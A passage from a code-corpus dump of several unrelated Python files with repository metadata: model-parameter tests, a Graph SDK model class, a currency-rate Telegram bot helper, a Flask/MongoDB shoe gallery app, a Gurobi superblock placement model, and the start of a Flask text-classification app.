get_args(model_name, dataset_location)\n image_generation_params = ImageGenerationParameters(args)\n additional_kwargs = dict(num_classes = num_classes)\n\n #Act\n update_params(image_generation_params, **additional_kwargs)\n\n #Assert\n self.assertEqual(num_classes, image_generation_params.num_classes)\n\nclass TestImageGenerationParameters(ut.TestCase):\n def test_init(self):\n with self.assertRaises(ValueError):\n #Arrange\n bad_dataset_location = dataset_location / 'non_existent_location'\n args = get_args(None, bad_dataset_location)\n\n #Act\n _ = ImageGenerationParameters(args)\n\n args = get_args(model_name, dataset_location)\n _ = ImageGenerationParameters(args)\n\nclass TestInputDataParameters(ut.TestCase):\n def test_init(self):\n with self.assertRaises(ValueError):\n args = get_args(None, None)\n _ = InputParameters(args)\n\n args = get_args(model_name, dataset_location)\n _ = InputParameters(args)\n\nclass TestTrainingParameters(ut.TestCase):\n def test_init(self):\n #Arrange\n args = get_args(None, None)\n \n #Act\n train_params = TrainingParameters(args)\n\n #Assert\n self.assertEqual(train_params.batch_id, args.batch_id)\n self.assertEqual(train_params.epoch_id, args.epoch_id)\n self.assertEqual(train_params.num_fit_images, args.num_fit_images)\n self.assertEqual(train_params.number_of_epochs, args.number_of_epochs)\n self.assertEqual(train_params.learning_rate, args.learning_rate)\n self.assertEqual(train_params.number_prediction_steps, args.number_prediction_steps)\n self.assertEqual(train_params.checkpoint_batch_interval, args.checkpoint_batch_interval)","repo_name":"NareshPS/humpback-whale","sub_path":"tests/input_test.py","file_name":"input_test.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"28739562856","text":"stock = {\n \"banana\":6,\n \"apple\":0,\n \"orange\":32,\n \"pear\":15}\nprices = dict(banana=4, apple=2, orange=1.5, pear=3)\ndef compute_bill(food):\n total = 0\n for item in food:\n if stock[item] > 0:\n total += prices[item]\n stock[item] -= 1\n return total\nprint(compute_bill([\"banana\", \"orange\", \"apple\"]))","repo_name":"abdulmoiz5656/forum2","sub_path":"q3.py","file_name":"q3.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15796845658","text":"from __future__ import annotations\nimport datetime\nfrom dataclasses import dataclass, field\nfrom kiota_abstractions.serialization import Parsable, ParseNode, SerializationWriter\nfrom typing import Any, Callable, Dict, List, Optional, TYPE_CHECKING, Union\n\nif TYPE_CHECKING:\n from .day_of_week import DayOfWeek\n from .device_configuration import DeviceConfiguration\n\nfrom .device_configuration import DeviceConfiguration\n\n@dataclass\nclass IosUpdateConfiguration(DeviceConfiguration):\n \"\"\"\n IOS Update Configuration, allows you to configure time window within week to install iOS updates\n \"\"\"\n # The OdataType property\n odata_type: Optional[str] = \"#microsoft.graph.iosUpdateConfiguration\"\n # Active Hours End (active hours mean the time window when updates install should not happen)\n active_hours_end: Optional[datetime.time] = None\n # Active Hours Start (active hours mean the time window when updates install should not happen)\n active_hours_start: Optional[datetime.time] = None\n # Days in week for which active hours are configured. 
This collection can contain a maximum of 7 elements.\n scheduled_install_days: Optional[List[DayOfWeek]] = None\n # UTC Time Offset indicated in minutes\n utc_time_offset_in_minutes: Optional[int] = None\n \n @staticmethod\n def create_from_discriminator_value(parse_node: Optional[ParseNode] = None) -> IosUpdateConfiguration:\n \"\"\"\n Creates a new instance of the appropriate class based on discriminator value\n param parse_node: The parse node to use to read the discriminator value and create the object\n Returns: IosUpdateConfiguration\n \"\"\"\n if not parse_node:\n raise TypeError(\"parse_node cannot be null.\")\n return IosUpdateConfiguration()\n \n def get_field_deserializers(self,) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"\n The deserialization information for the current model\n Returns: Dict[str, Callable[[ParseNode], None]]\n \"\"\"\n from .day_of_week import DayOfWeek\n from .device_configuration import DeviceConfiguration\n\n from .day_of_week import DayOfWeek\n from .device_configuration import DeviceConfiguration\n\n fields: Dict[str, Callable[[Any], None]] = {\n \"activeHoursEnd\": lambda n : setattr(self, 'active_hours_end', n.get_time_value()),\n \"activeHoursStart\": lambda n : setattr(self, 'active_hours_start', n.get_time_value()),\n \"scheduledInstallDays\": lambda n : setattr(self, 'scheduled_install_days', n.get_collection_of_enum_values(DayOfWeek)),\n \"utcTimeOffsetInMinutes\": lambda n : setattr(self, 'utc_time_offset_in_minutes', n.get_int_value()),\n }\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n \n def serialize(self,writer: SerializationWriter) -> None:\n \"\"\"\n Serializes information the current object\n param writer: Serialization writer to use to serialize this model\n Returns: None\n \"\"\"\n if not writer:\n raise TypeError(\"writer cannot be null.\")\n super().serialize(writer)\n writer.write_time_value(\"activeHoursEnd\", self.active_hours_end)\n writer.write_time_value(\"activeHoursStart\", self.active_hours_start)\n writer.write_collection_of_enum_values(\"scheduledInstallDays\", self.scheduled_install_days)\n writer.write_int_value(\"utcTimeOffsetInMinutes\", self.utc_time_offset_in_minutes)\n \n\n","repo_name":"microsoftgraph/msgraph-sdk-python","sub_path":"msgraph/generated/models/ios_update_configuration.py","file_name":"ios_update_configuration.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","stars":186,"dataset":"github-code","pt":"37"} +{"seq_id":"36966462394","text":"import yfinance as yf\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import MultipleLocator, AutoMinorLocator, AutoLocator\nimport pandas as pd\n\n\"\"\"\nGlobal values for storing dollar and euro values. Updates every 20 sec in separate threads\nIf user set up signal, it produces another monitoring thread in signal_routine_dollar and \nsignal_routine_euro where this global values used. Maybe it's not the best practice to use global val \nfor storing information between threads... 
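A lock-guarded module-level store is a common alternative (a sketch, assuming only the latest quote per currency matters):\n\n    import threading\n    _rate_lock = threading.Lock()\n    rates = {}\n\n    def set_rate(name, value):\n        with _rate_lock:\n            rates[name] = value\n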
\n\"\"\"\n\ntransient_val_dollar = 0.0\ntransient_val_euro = 0.0\n\ndef daily_routine(context):\n USD = yf.Ticker(\"RUB=X\")\n EUR = yf.Ticker(\"EURRUB=X\")\n dfUSD = USD.history(period='2mo', interval='1d')\n dfEUR = EUR.history(period='2mo', interval='1d')\n draw_pic(dfUSD, 'dol')\n draw_pic(dfEUR, 'eur')\n\ndef show_dollar(context):\n global transient_val_dollar\n USD = yf.Ticker(\"RUB=X\")\n priceNow = USD.info['bid']\n # transient_val_dollar = priceNow\n return priceNow\n\ndef show_euro(context):\n global transient_val_euro\n EUR = yf.Ticker(\"EURRUB=X\")\n priceNow = EUR.info['bid']\n # transient_val_euro = priceNow\n return priceNow\n\"\"\"\ndef signal_message_dollar(context):\n context.bot.send_message(chat_id=context.job.context, text='')\n\ndef signal_message_euro(context):\n context.bot.send_message(chat_id=context.job.context, text='')\n\"\"\"\n\n\ndef signal_routine_dollar(context):\n #10:00:00 — 22:00:00\n jc = context.job.context['dol_data']\n user_ids = jc.keys()\n showDollar = show_dollar(context)\n for id_ in user_ids:\n if id_ is None:\n continue\n _trig_less = jc[id_]['trig_less']\n _trig_more = jc[id_]['trig_more']\n if showDollar > jc[id_]['val']:\n if _trig_less:\n context.bot.send_message(chat_id=id_,\n text='Обратите внимание на курс доллара!\\n'\n 'Ваш сигнал {}'.format(jc[id_]['val']))\n _trig_less = False\n _trig_more = True\n if showDollar < jc[id_]['val']:\n if _trig_more:\n context.bot.send_message(chat_id=id_,\n text='Обратите внимание на курс доллара!\\n'\n 'Ваш сигнал {}'.format(jc[id_]['val']))\n _trig_less = True\n _trig_more = False\n jc[id_]['trig_less'] = _trig_less\n jc[id_]['trig_more'] = _trig_more\n\n\ndef signal_routine_euro(context):\n #10:00:00 — 22:00:00\n jc = context.job.context['eur_data']\n user_ids = jc.keys()\n showEuro = show_euro(context)\n for id_ in user_ids:\n if id_ is None:\n continue\n _trig_less = jc[id_]['trig_less']\n _trig_more = jc[id_]['trig_more']\n if showEuro > jc[id_]['val']:\n if _trig_less:\n context.bot.send_message(chat_id=id_,\n text='Обратите внимание на курс евро!\\n'\n 'Ваш сигнал {}'.format(jc[id_]['val']))\n _trig_less = False\n _trig_more = True\n if showEuro < jc[id_]['val']:\n if _trig_more:\n context.bot.send_message(chat_id=id_,\n text='Обратите внимание на курс евро!\\n'\n 'Ваш сигнал {}'.format(jc[id_]['val']))\n _trig_less = True\n _trig_more = False\n jc[id_]['trig_less'] = _trig_less\n jc[id_]['trig_more'] = _trig_more\n\ndef draw_pic(dataframe, currency):\n # check types\n if not isinstance(dataframe, pd.DataFrame):\n raise TypeError('{} should be Pandas.DataFrame object'.format(dataframe))\n if not (currency == 'dol') | (currency == 'eur'):\n raise NameError('{} should be \\'dol\\' or \\'eur\\''.format(currency))\n\n # Draw pic\n fig, ax = plt.subplots(figsize=(10, 7))\n\n mean_val = dataframe.loc[:, ['High', 'Low']].mean(axis=1)\n x_values = dataframe.index.strftime('%b %d')\n\n ax.fill_between(x_values, dataframe['High'], dataframe['Low'], color='Purple', alpha=0.2)\n ax.plot(x_values, mean_val, linewidth=2, color='Purple')\n\n ax.tick_params(axis='x', direction='out', length=8)\n ax.xaxis.set_major_locator(MultipleLocator(4))\n ax.yaxis.set_major_locator(AutoLocator())\n ax.xaxis.set_minor_locator(AutoMinorLocator())\n ax.grid(which='both')\n for tick in ax.get_xticklabels():\n tick.set_rotation(45)\n if currency == 'dol':\n ax.set_title('USD/RUB', fontsize=16, pad=25)\n ax.set_ylabel('RUB per USD')\n fig.savefig('picDol.png')\n if currency == 'eur':\n ax.set_title('EUR/RUB', fontsize=16, 
pad=25)\n ax.set_ylabel('RUB per EUR')\n fig.savefig('picEur.png')\n","repo_name":"pinchazer/myTelegramBot","sub_path":"dataobtain.py","file_name":"dataobtain.py","file_ext":"py","file_size_in_byte":4961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34155100449","text":"\"\"\" Python app-code \"\"\"\nimport os\nfrom flask import (\n Flask, flash, render_template, redirect, request, session, url_for)\nfrom flask_pymongo import PyMongo\nfrom bson.objectid import ObjectId\nfrom werkzeug.security import generate_password_hash, check_password_hash\nif os.path.exists(\"env.py\"):\n import env\n\n\napp = Flask(__name__)\n\napp.config[\"MONGO_DBNAME\"] = os.environ.get(\"MONGO_DBNAME\")\napp.config[\"MONGO_URI\"] = os.environ.get(\"MONGO_URI\")\napp.secret_key = os.environ.get(\"SECRET_KEY\")\n\n\n\"\"\" Set up an instance of PyMongo\n (insure Flask app is communicating with MongoDB) \"\"\"\nmongo = PyMongo(app)\n\n\n@app.route(\"/\") # default url also leads to this\n@app.route(\"/home_page\")\ndef home_page():\n return render_template(\"index.html\")\n\n\n@app.route(\"/get_shoes\")\ndef get_shoes():\n \"\"\" Retrieve all shoes for Gallery-page \"\"\"\n shoes = list(mongo.db.shoes.find())\n return render_template(\"shoes.html\", shoes=shoes)\n\n\n@app.route(\"/search\", methods=[\"GET\", \"POST\"])\ndef search():\n query = request.form.get(\"query\")\n shoes = list(mongo.db.shoes.find({\"$text\": {\"$search\": query}}))\n return render_template(\"shoes.html\", shoes=shoes)\n\n\n@app.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n if request.method == \"POST\":\n # Check if username already exists in database\n existing_user = mongo.db.users.find_one(\n {\"username\": request.form.get(\"username\").lower()})\n\n if existing_user:\n flash(\"This username already exists! Please try again.\")\n return redirect(url_for(\"register\"))\n\n register = {\n \"username\": request.form.get(\"username\").lower(),\n \"password\": generate_password_hash(request.form.get(\"password\")),\n \"email\": request.form.get(\"email\").lower()\n }\n mongo.db.users.insert_one(register)\n\n # Put the new user into a \"session\"-cookie\n session[\"user\"] = request.form.get(\"username\").lower()\n flash(\"Registration successful! 
You may now upload and share your own favourite shoes!\")\n return redirect(url_for(\"profile\", username=session[\"user\"]))\n return render_template(\"register.html\")\n\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n if request.method == \"POST\":\n # Check if username already exists in database\n existing_user = mongo.db.users.find_one(\n {\"username\": request.form.get(\"username\").lower()})\n\n if existing_user:\n # Check if entered password matches hashed password in db\n if check_password_hash(\n existing_user[\"password\"], request.form.get(\"password\")):\n session[\"user\"] = request.form.get(\"username\").lower()\n flash(\"Welcome, {}\".format(request.form.get(\"username\")))\n return redirect(url_for(\"profile\", username=session[\"user\"]))\n\n else:\n # If password doesn't match\n flash(\"Incorrect username and/or password\")\n return redirect(url_for(\"login\"))\n\n else:\n # If username doesn't exist\n flash(\"Incorrect username and/or password\")\n return redirect(url_for(\"login\"))\n\n return render_template(\"login.html\")\n\n\n@app.route(\"/profile/\", methods=[\"GET\", \"POST\"])\ndef profile(username):\n # Grab the session-user's username from db (and only username)\n username = mongo.db.users.find_one({\"username\": session[\"user\"]})[\"username\"]\n shoes = list(mongo.db.shoes.find())\n\n if session[\"user\"]:\n return render_template(\"profile.html\", shoes=shoes, username=username)\n\n # If session-cookie is gone, redirect to login (for security)\n return redirect(url_for(\"login\"))\n\n\n@app.route(\"/logout\")\ndef logout():\n # Remove the users session-cookie to log out\n flash(\"You have been logged out.\")\n session.pop(\"user\")\n return redirect(url_for(\"login\"))\n\n\n@app.route(\"/add_shoes\", methods=[\"GET\", \"POST\"])\ndef add_shoes():\n if request.method == \"POST\":\n is_private = \"yes\" if request.form.get(\"is_private\") else \"no\"\n shoes = {\n \"category_name\": request.form.get(\"category_name\"),\n \"shoes_name\": request.form.get(\"shoes_name\"),\n \"shoes_description\": request.form.get(\"shoes_description\"),\n \"brand_name\": request.form.get(\"brand_name\"),\n \"comfort_level\": request.form.get(\"comfort-level\"),\n \"design_level\": request.form.get(\"design-level\"),\n \"construction_level\": request.form.get(\"construction-level\"),\n \"heel_height\": request.form.get(\"heel_height\"),\n \"toe_shape\": request.form.get(\"toe_shape\"),\n \"shoes_image\": request.form.get(\"shoes_image\"),\n \"username\": session[\"user\"],\n \"date_added\": request.form.get(\"date_added\"),\n \"is_private\": is_private\n }\n mongo.db.shoes.insert_one(shoes)\n flash(\"New shoes successfully added!\")\n return redirect(url_for(\"get_shoes\"))\n\n categories = mongo.db.categories.find().sort(\"category_name\", 1)\n return render_template(\"add_shoes.html\", categories=categories)\n\n\n@app.route(\"/edit_shoes/\", methods=[\"GET\", \"POST\"])\ndef edit_shoes(shoes_id):\n if request.method == \"POST\":\n is_private = \"yes\" if request.form.get(\"is_private\") else \"no\"\n submit = {\n \"category_name\": request.form.get(\"category_name\"),\n \"shoes_name\": request.form.get(\"shoes_name\"),\n \"shoes_description\": request.form.get(\"shoes_description\"),\n \"brand_name\": request.form.get(\"brand_name\"),\n \"comfort_level\": request.form.get(\"comfort-level\"),\n \"design_level\": request.form.get(\"design-level\"),\n \"construction_level\": request.form.get(\"construction-level\"),\n \"heel_height\": 
request.form.get(\"heel_height\"),\n \"toe_shape\": request.form.get(\"toe_shape\"),\n \"shoes_image\": request.form.get(\"shoes_image\"),\n \"username\": session[\"user\"],\n \"date_added\": request.form.get(\"date_added\"),\n \"is_private\": is_private\n }\n mongo.db.shoes.update_one({\"_id\": ObjectId(shoes_id)}, {\"$set\": submit})\n flash(\"Record successfully updated.\")\n return redirect(url_for('profile', username=session['user']))\n\n shoes = mongo.db.shoes.find_one({\"_id\": ObjectId(shoes_id)})\n\n categories = mongo.db.categories.find().sort(\"category_name\", 1)\n return render_template(\"edit_shoes.html\", shoes=shoes, categories=categories)\n\n\n@app.route(\"/delete_shoes/\")\ndef delete_shoes(shoes_id):\n mongo.db.shoes.delete_one({\"_id\": ObjectId(shoes_id)})\n flash(\"This record has now been deleted\")\n return redirect(url_for('profile', username=session['user']))\n\n\n@app.route(\"/get_categories\")\ndef get_categories():\n categories = list(mongo.db.categories.find().sort(\"category_name\", 1))\n return render_template(\"categories.html\", categories=categories)\n\n\n@app.route(\"/add_category\", methods=[\"GET\", \"POST\"])\ndef add_category():\n if request.method == \"POST\":\n category = {\n \"category_name\": request.form.get(\"category_name\")\n }\n mongo.db.categories.insert_one(category)\n flash(\"New category successfully added.\")\n return redirect(url_for(\"get_categories\"))\n\n return render_template(\"add_category.html\")\n\n\n@app.route(\"/edit_category/\", methods=[\"GET\", \"POST\"])\ndef edit_category(category_id):\n if request.method == \"POST\":\n submit = {\n \"category_name\": request.form.get(\"category_name\")\n }\n mongo.db.categories.update_one({\"_id\": ObjectId(category_id)}, {\"$set\": submit})\n flash(\"Category successfully updated.\")\n return redirect(url_for(\"get_categories\"))\n\n category = mongo.db.categories.find_one({\"_id\": ObjectId(category_id)})\n return render_template(\"edit_category.html\", category=category)\n\n\n@app.route(\"/delete_category/\")\ndef delete_category(category_id):\n mongo.db.categories.delete_one({\"_id\": ObjectId(category_id)})\n flash(\"Category successfully deleted.\")\n return redirect(url_for(\"get_categories\"))\n\n\n# Run app\nif __name__ == \"__main__\":\n app.run(host=os.environ.get(\"IP\"),\n port=int(os.environ.get(\"PORT\")),\n debug=False)\n","repo_name":"Gurimarie/my_favourite_shoes","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8350,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"24461601894","text":"import gurobipy as gp\nfrom gurobipy import GRB\nfrom pandas import *\nimport numpy as np\nimport pandas as pd\nfrom preprocessing.ParameterSet import *\n\n\ndef execute_superblock(pm):\n\n m = gp.Model('Superblock')\n\n\n # decision variables\n visitors = {}\n for g1 in pm.set_G:\n for g2 in pm.set_G:\n for i in pm.set_I:\n #print(\"are here\")\n visitors[g1, g2, i] = m.addVar(vtype=GRB.CONTINUOUS, name='visitors from gate '+ str(g1)+' to gate ' + str(g2)+ ' for center type '+ str(i))\n\n selfVisitors = {}\n for sb in pm.set_SB:\n for i in pm.set_I:\n selfVisitors[sb, i] = m.addVar(vtype=GRB.CONTINUOUS, name='selfVisitors from sb '+str(sb)+' for center '+str(i))\n\n visFreq = {}\n for sb in pm.set_SB:\n for i in pm.set_I:\n visFreq[sb, i] = m.addVar(vtype=GRB.CONTINUOUS, name='visFreq of sb '+str(sb) +' for center '+str(i))\n\n placementKey = {}\n for sb2 in pm.set_SB:\n for i in pm.set_I:\n 
#print(\"are here_2\")\n placementKey[sb2, i] = m.addVar(vtype=GRB.BINARY, name='placementKey for sb' + str(sb2) + ' and center ' + str(i))\n\n z = {}\n for g1 in pm.set_G:\n for g2 in pm.set_G:\n for i in pm.set_I:\n #print(\"are here 3\")\n z[g1, g2, i] = m.addVar(vtype=GRB.BINARY, name='z ' + str(g1) + ' ' + str(g2) + ' ' + str(i))\n\n m.update()\n\n # objective function\n # Minimize sum of traveled distances\n m.setObjective(sum(sum(sum(visitors[g1, g2, i] * pm.distances.iloc[g1, g2]\n for g2 in pm.set_G) for g1 in pm.set_G)for i in pm.set_I), GRB.MINIMIZE)\n\n # constraints\n # constraint 1\n # Sum of all Visitors and selfVisitors from a specific gate in a superblock\n # to all general gates, for a specific center\n # equal the visitor frequency for the specific center for all superblocks and all specific centers\n for sb in pm.set_SB:\n gates_of_sb = pm.subset_G_SB[sb] # e.g. sb = 1 G_sb = [0, 1]; sb = 2 G_sb = [2, 3]\n for i in pm.set_I:\n m.addConstr((sum(sum(visitors[g1, g2, i] for g2 in pm.set_G)\n for g1 in gates_of_sb) + selfVisitors[sb, i] == visFreq[sb, i]), \"1\")\n\n # constraint 1a\n # Greater/equal zero constraint for visitors for all general gates and all specific centers\n for g1 in pm.set_G:\n for g2 in pm.set_G:\n for i in pm.set_I:\n m.addConstr((visitors[g1, g2, i] >= 0), \"1a\")\n\n # constraint 1b\n # Greater/equal zero constraint for selfVisitors for all superblocks and all specific centers\n for sb in pm.set_SB:\n for i in pm.set_I:\n m.addConstr((selfVisitors[sb, i] >= 0), \"1b\")\n\n\n # constraint 1c\n # visitors from g1 of sb to g2 of sb must be equal to zero for all superblocks,\n # for all block specific gates and all specific centers\n for sb in pm.set_SB:\n gates_of_sb = pm.subset_G_SB[sb]\n for g1 in gates_of_sb:\n for g2 in gates_of_sb:\n for i in pm.set_I:\n m.addConstr((visitors[g1, g2, i] == 0), \"1c\")\n\n # constraint 1d\n # make sure that the selfVisitors aren't too large for a realistic value (to prevent it does not get artificially\n # increased to fulfill the min. 
center utilization constraint)\n # still can change the factor for demand\n for sb in pm.set_SB:\n for c in pm.set_C:\n for i_c in (pm.subset_I_c[c]):\n m.addConstr((selfVisitors[sb, i_c] <= pm.demand_c[c] * 3), \"1d\")\n\n # constraint 2a\n # Sum of visitors frequency overall superblocks is greater/equal to minimal required utilization for all center types\n # and for all specific centers\n for c in pm.set_C:\n for i_c in (pm.subset_I_c[c]):\n m.addConstr(sum(visFreq[sb, i_c] for sb in pm.set_SB) >= pm.capacity_c[c] * pm.beta[c] * sum(\n placementKey[sb, i_c] for sb in pm.set_SB), \"2a\")\n\n # constraint 2b\n # Sum of visitors frequency overall superblocks is less/equal the utilization for all center types\n # and for all specific centers\n for c in pm.set_C:\n #print(\"2b\")\n for i_c in (pm.subset_I_c[c]):\n m.addConstr(sum(visFreq[sb, i_c] for sb in pm.set_SB) <= pm.capacity_c[c], \"2b\")\n\n # constraint 3\n # Sum of visitor frequency overall specific centers is greater/equal center type demand d\n # for all center types and all superblocks\n for c in pm.set_C:\n for sb in pm.set_SB:\n if sb not in pm.subset_SB_with_GC:\n m.addConstr((sum(visFreq[sb, i_c] for i_c in (pm.subset_I_c[c])) >= pm.demand_c[c]), \"3\")\n\n # constraint 4a\n # Big M constraint\n # if center is placed, visitors must be less than threshold M for all superblocks, for all general centers,\n # for all general gates and for block specific gates (to make sure that visitor's don't visit a center instance i\n # that hasn't been build)\n for sb in pm.set_SB: # we loop through all sb's that potentially have the center instance i\n gates_of_sb = pm.subset_G_SB[sb]\n for i in pm.set_I:\n for g1 in pm.set_G:\n for g2 in gates_of_sb:\n m.addConstr((visitors[g1, g2, i]\n <= placementKey[sb, i] * pm.M), \"4a\")\n\n # constraint 4b\n # Big M constraint\n # If center is placed visitors to SelfVisitors to center must be less than threshold M for all superblocks\n # and for all general centers\n for sb in pm.set_SB:\n #print(\"4b\")\n for i in pm.set_I:\n m.addConstr((selfVisitors[sb, i]\n <= placementKey[sb, i] * pm.M), \"4b\")\n\n # constraint 4c\n # Sum of placementKey overall superblocks must be less/equal 1 for all general centers\n # (each center can only be placed maximal once)\n for i in pm.set_I:\n m.addConstr(sum(placementKey[sb, i] for sb in pm.set_SB) <= 1, \"4c\")\n\n # constraint 5\n # Distances that are traveled from g1 to g2 for a specific center must be less/equal the maxDistance\n # per center type for all center types, specific centers and general gates\n for c in pm.set_C:\n for i_c in pm.subset_I_c[c]:\n for g1 in pm.set_G:\n for g2 in pm.set_G:\n m.addConstr((z[g1, g2, i_c] * (pm.distances.iloc[g1, g2]) <= pm.max_dist_c[c]), \"5\")\n\n # constraint 5a\n # Big M constraint that sets z[g1, g2, i] == 1 if there are visitors from g1 to g2 for i\n for c in pm.set_C:\n\n #print(\"5a\")\n for i in pm.subset_I_c[c]:\n for g1 in pm.set_G:\n for g2 in pm.set_G:\n m.addConstr((visitors[g1, g2, i] <= z[g1, g2, i] * pm.M), \"5a\")\n\n # constraint 6\n # The areas of all placed specific centers must be less/equal the maximum available area\n # in a superblock for all superblocks. The max. 
area is 0 in case the superblock is reserved for gigacenter.\n # Therefore, we just sum up all c's that are not giga centers.\n for sb in pm.set_SB:\n if sb not in pm.subset_SB_with_GC:\n m.addConstr(sum(sum(pm.area_c[c] * placementKey[sb, i] for i in (pm.subset_I_c[c])) for c in\n list(set(pm.set_C))) <= pm.max_area_per_sb[sb], \"6aa\")\n else:\n m.addConstr(sum(sum(pm.area_c[c] * placementKey[sb, i] for i in (pm.subset_I_c[c])) for c in\n list(set(pm.set_C) - set(pm.subset_C_gigac))) <= pm.max_area_per_sb[sb], \"6ab\")\n\n\n # constraint 6a\n # The placement key is already defined for sb's that are reserved for gigacenter:\n for sb in pm.subset_SB_with_GC:\n # look up assigned center typ\n assigned_centertyp = pm.dict_sb_giga_centertype[sb]\n assigned_center_instances = pm.subset_I_c[assigned_centertyp]\n m.addConstr(sum(placementKey[sb, i] for i in assigned_center_instances) == 1)\n\n\n # constraint 7a\n # A given proportion from the superblock demand for commercial building centers has to go to zone 1\n for sb in pm.set_SB:\n if sb not in pm.subset_SB_with_GC:\n for c_commerc in pm.subset_C_commc:\n\n m.addConstr(sum(sum(sum(visitors[g1, g2, i] for g2 in pm.subset_G_zone1[g1]) for g1 in pm.subset_G_SB[sb])\n for i in pm.subset_I_c[c_commerc]) >= pm.demand_c[c_commerc] * pm.prop_demand_zone1)\n\n # constraint 7b\n # A given proportion from the superblock demand for commercial building centers has to go to zone 2\n for sb in pm.set_SB:\n if sb not in pm.subset_SB_with_GC:\n for c_commerc in pm.subset_C_commc:\n m.addConstr(sum(\n sum(sum(visitors[g1, g2, i] for g2 in pm.subset_G_zone2[g1]) for g1 in pm.subset_G_SB[sb]) for i in\n pm.subset_I_c[c_commerc]) >= pm.demand_c[c_commerc] * pm.prop_demand_zone2)\n\n\n # symmetry breaking constraint\n for c in pm.set_C:\n for i in pm.subset_I_c[c]:\n if i <= len(pm.subset_I_c[c]) - 1:\n m.addConstr(\n sum(placementKey[sb, i] for sb in pm.set_SB) >= sum(placementKey[sb, i + 1] for sb in pm.set_SB))\n\n # execution\n m.Params.TimeLimit = 500\n m.optimize()\n\n #for v in m.getVars():\n # if (v.x > 0):\n # print('%s %g' % (v.varName, v.x))\n\n return m, m.getVars();\n\n\nparams = Params([[5,'Hospital'],[6,'University'],[9,'Industry']])\n\n\nm, result = execute_superblock(params)\n\ndef create_output(model):\n\n visitors = [] #{}\n for g1 in params.set_G:\n for g2 in params.set_G:\n for i in params.set_I:\n value = str(model.getVarByName('visitors from gate '+ str(g1) +' to gate ' + str(g2)+ ' for center type '+ str(i)))\n value = value.split('value')[1]\n value = value.split('.')[0]\n visitors.append({'g1': g1,\n 'g2': g2,\n 'i': i,\n 'visitors': int(value)})\n #visitors[g1,g2,i] = int(value)\n visitors = pd.DataFrame(visitors, index = None)\n\n\n selfVisitors = [] #{}\n for sb in params.set_SB:\n for i in params.set_I:\n value = str(model.getVarByName('selfVisitors from sb '+str(sb)+' for center '+str(i)))\n value = value.split('value')[1]\n value = value.split('.')[0] \n selfVisitors.append({'sb': sb,\n 'i': i,\n 'selfVisitors': int(value)})\n #selfVisitors[sb,i] = int(value)\n selfVisitors = pd.DataFrame(selfVisitors, index = None)\n\n\n visFreq = [] #{}\n for sb in params.set_SB:\n for i in params.set_I:\n value = str(model.getVarByName('visFreq of sb '+str(sb) +' for center '+str(i)))\n value = value.split('value')[1]\n value = value.split('.')[0] \n visFreq.append({'sb': sb,\n 'i': i,\n 'centername': params.dict_centerinstance_centertype[i],\n 'visFreq': int(value)})\n #visFreq[sb,i] = int(value)\n visFreq = pd.DataFrame(visFreq, index = 
None)\n\n\n    placementKey = [] #{}\n    for sb2 in params.set_SB:\n        for i in params.set_I:\n            value = str(model.getVarByName('placementKey for sb' + str(sb2) + ' and center ' + str(i))).split('value')[1]\n            value = value.split('.')[0]\n            placementKey.append({'sb2': sb2,\n                                 'i': i,\n                                 'centername':params.dict_centerinstance_centertype[i],\n                                 'placementKey': int(value)})\n            #placementKey[sb,i] = int(value)\n    placementKey = pd.DataFrame(placementKey, index = None)\n\n    z = []#{}\n    for g1 in params.set_G:\n        for g2 in params.set_G:\n            for i in params.set_I:\n                value = str(model.getVarByName('z ' + str(g1) + ' ' + str(g2) + ' ' + str(i))).split('value')[1]\n                value = value.split('.')[0]\n                z.append({'g1': g1,\n                          'g2': g2,\n                          'i': i,\n                          'z': int(value)})\n                #z[g1,g2,i] = int(value)\n    z = pd.DataFrame(z, index = None)\n\n    return visitors, selfVisitors, visFreq, placementKey, z\n    \nvisitors,selfVisitors, visFreq, placementKey,z = create_output(m)\n\nwriter = pd.ExcelWriter('Output_4x4.xlsx')  # the pandas module is only bound as pd by the imports above\n\nplacementKey.to_excel(writer, \"PlacementKey\")\nvisitors.to_excel(writer, \"Visitors\")\nvisFreq.to_excel(writer, \"VisFreq\")\nz.to_excel(writer,\"z\")\nselfVisitors.to_excel(writer,\"SelfVisitors\")\n\n\n\nwriter.save()\n\"\"\"\nplacementKey.to_excel('output\\dummy.xlsx', 'placementKey')\nvisitors.to_excel('output\\dummy.xlsx', 'visitors')\nselfVisitors.to_excel('output\\dummy.xlsx', 'selfVisitors')\n\nvisFreq.to_excel('output\\dummy.xlsx', 'visFreq')\nz.to_excel('output\\dummy.xlsx', 'z')\n\"\"\"\n\n\n\n\n","repo_name":"TheresaGittew/superblock","sub_path":"Superblock_MILP_funct.py","file_name":"Superblock_MILP_funct.py","file_ext":"py","file_size_in_byte":13013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"44062954014","text":"from flask import Flask\nfrom flask import render_template, request, jsonify\nimport re\nimport os\nimport json\nimport plotly\nimport sqlalchemy\nimport joblib\nimport pandas as pd\nimport numpy as np\nimport nltk\nnltk.download(['punkt', 'wordnet', 'stopwords'])\n\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer\nfrom plotly.graph_objs import Bar\nfrom sqlalchemy import create_engine\n\napp = Flask(__name__)\n\ndef tokenize(text):\n    #Normalize text & remove punctuation\n    text = text.lower()\n    text = re.sub(r\"[^a-zA-Z0-9]\", \" \", text)\n    \n    #Tokenize text, remove stop words\n    tokens = word_tokenize(text)\n    stop_words = stopwords.words(\"english\")\n    words = [w for w in tokens if w not in stop_words]\n    \n\n    # Reduce words to their root form\n    lemmatizer = WordNetLemmatizer()\n 